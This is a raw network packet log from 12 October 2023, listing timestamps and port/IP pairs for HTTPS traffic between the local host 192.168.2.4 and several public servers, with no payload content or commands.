                                                                                Oct 12, 2023 17:42:14.804804087 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.804904938 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.805080891 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.805100918 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.805223942 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.852317095 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.852339029 CEST44349751142.250.188.228192.168.2.4
                                                                                Oct 12, 2023 17:42:14.852402925 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.852415085 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:14.852432966 CEST44349753209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:14.893441916 CEST49751443192.168.2.4142.250.188.228
                                                                                Oct 12, 2023 17:42:14.893556118 CEST49753443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.035202980 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.035267115 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.035389900 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.035427094 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.035470963 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.035511017 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.036087990 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.036134958 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.036174059 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.036185980 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.036227942 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.036248922 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.037003040 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.037044048 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.037084103 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.037095070 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.037127018 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.037143946 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.177495956 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.177525043 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.177566051 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.177594900 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.177608013 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.177762985 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.177763939 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.177834034 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.177936077 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.178200960 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.178222895 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.178277969 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.178299904 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.178325891 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.178363085 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.223748922 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.223902941 CEST44349750217.61.57.241192.168.2.4
                                                                                Oct 12, 2023 17:42:15.224009991 CEST49750443192.168.2.4217.61.57.241
                                                                                Oct 12, 2023 17:42:15.351596117 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.351627111 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.351811886 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.351845980 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.351871967 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.351897955 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.351913929 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.351932049 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.351994038 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.352035999 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.352258921 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.352278948 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.352329016 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.352341890 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.352370977 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.352391958 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.525546074 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.525576115 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.525846958 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.525907040 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.525990963 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.526367903 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.526391029 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.526467085 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.526482105 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.526515961 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.526536942 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.527653933 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.527678013 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.527750015 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.527762890 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.527815104 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.528652906 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.528681993 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.528737068 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.528748035 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.528785944 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.528805971 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.529535055 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.529563904 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.529613018 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.529623985 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.529652119 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.529676914 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.531953096 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.531972885 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.532052994 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.532064915 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.532124996 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.543158054 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.543212891 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.543288946 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.543464899 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.543553114 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.543631077 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.543816090 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.543891907 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.543960094 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.544353962 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.544372082 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.544636965 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.544676065 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.545053959 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.545078039 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.545677900 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.545708895 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.545768976 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.546216965 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.546231031 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.546859026 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.546878099 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.546930075 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.548070908 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.548080921 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.550524950 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.550601006 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.550679922 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.551541090 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.551575899 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.697814941 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.697841883 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.697982073 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.698008060 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.698069096 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.698961973 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.698985100 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.699052095 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.699059963 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.699107885 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.699867964 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.699882984 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.699939013 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.699945927 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.699990988 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.701100111 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.701116085 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.701179981 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.701185942 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.701232910 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.702085018 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.702099085 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.702169895 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.702177048 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.702222109 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.703175068 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.703190088 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.703260899 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.703268051 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.703319073 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.704096079 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.704111099 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.704173088 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.704179049 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.704222918 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.704930067 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.704945087 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.705004930 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.705012083 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.705054998 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.705796957 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.705812931 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.705895901 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.705902100 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.705944061 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.707143068 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.707159996 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.707223892 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.707231998 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.707283020 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.708229065 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.708244085 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.708309889 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.708317041 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.708355904 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.737065077 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.737092018 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.737189054 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.737196922 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.737246990 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.779692888 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.779706955 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.779838085 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.779850006 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.779901028 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.872698069 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.872713089 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.872837067 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.872865915 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.872941971 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.874941111 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.874954939 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.875049114 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.875056028 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.875102043 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.876254082 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.876275063 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.876347065 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.876354933 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.876413107 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.877425909 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.877439976 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.877505064 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.877511978 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.877556086 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.878736973 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.878751040 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.878825903 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.878833055 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.878880024 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.879503965 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.879518032 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.879578114 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.879584074 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.879631996 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.880263090 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.880321980 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.880332947 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.880352020 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.880361080 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.880398035 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.881387949 CEST49752443192.168.2.4209.94.90.1
                                                                                Oct 12, 2023 17:42:15.881401062 CEST44349752209.94.90.1192.168.2.4
                                                                                Oct 12, 2023 17:42:15.892971992 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.893455982 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.893466949 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.894335985 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.894416094 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.896395922 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.896450043 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.896960020 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.896965027 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:15.940007925 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:15.972498894 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.983405113 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.989021063 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.989031076 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.989489079 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.989545107 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.990226030 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.990298986 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.990711927 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.990789890 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.992692947 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.992785931 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.992958069 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.993098021 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.993182898 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.993187904 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.993277073 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.993297100 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.994929075 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.995187044 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.995215893 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.995527983 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.995589018 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.995760918 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.995774031 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.995912075 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.995939970 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.996648073 CEST44349759104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.996721029 CEST49759443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.997199059 CEST44349758104.18.11.207192.168.2.4
                                                                                Oct 12, 2023 17:42:15.997279882 CEST49758443192.168.2.4104.18.11.207
                                                                                Oct 12, 2023 17:42:15.997359991 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.997419119 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.998312950 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.998394012 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:15.998491049 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:15.998501062 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.039000034 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.039134979 CEST49755443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.040301085 CEST49756443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.263209105 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.264951944 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.264992952 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265017986 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265037060 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265086889 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.265101910 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265131950 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.265317917 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265342951 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265387058 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.265391111 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.265431881 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.266161919 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.266210079 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.266242027 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.266249895 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.266253948 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.266300917 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.267111063 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.267163038 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.267208099 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.267211914 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.268052101 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.268100977 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.268105030 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.268136978 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.268177986 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.268332958 CEST49757443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.268346071 CEST44349757104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.272773027 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.272813082 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.272888899 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.273390055 CEST49760443192.168.2.4104.17.24.14
                                                                                Oct 12, 2023 17:42:16.273401976 CEST44349760104.17.24.14192.168.2.4
                                                                                Oct 12, 2023 17:42:16.279706001 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.279778004 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.279803038 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.279830933 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.279840946 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.279889107 CEST49754443192.168.2.4151.101.2.137
                                                                                Oct 12, 2023 17:42:16.285254955 CEST44349754151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.289681911 CEST44349756151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290214062 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290227890 CEST44349755151.101.2.137192.168.2.4
                                                                                Oct 12, 2023 17:42:16.290271044 CEST44349755151.101.2.137192.168.2.4
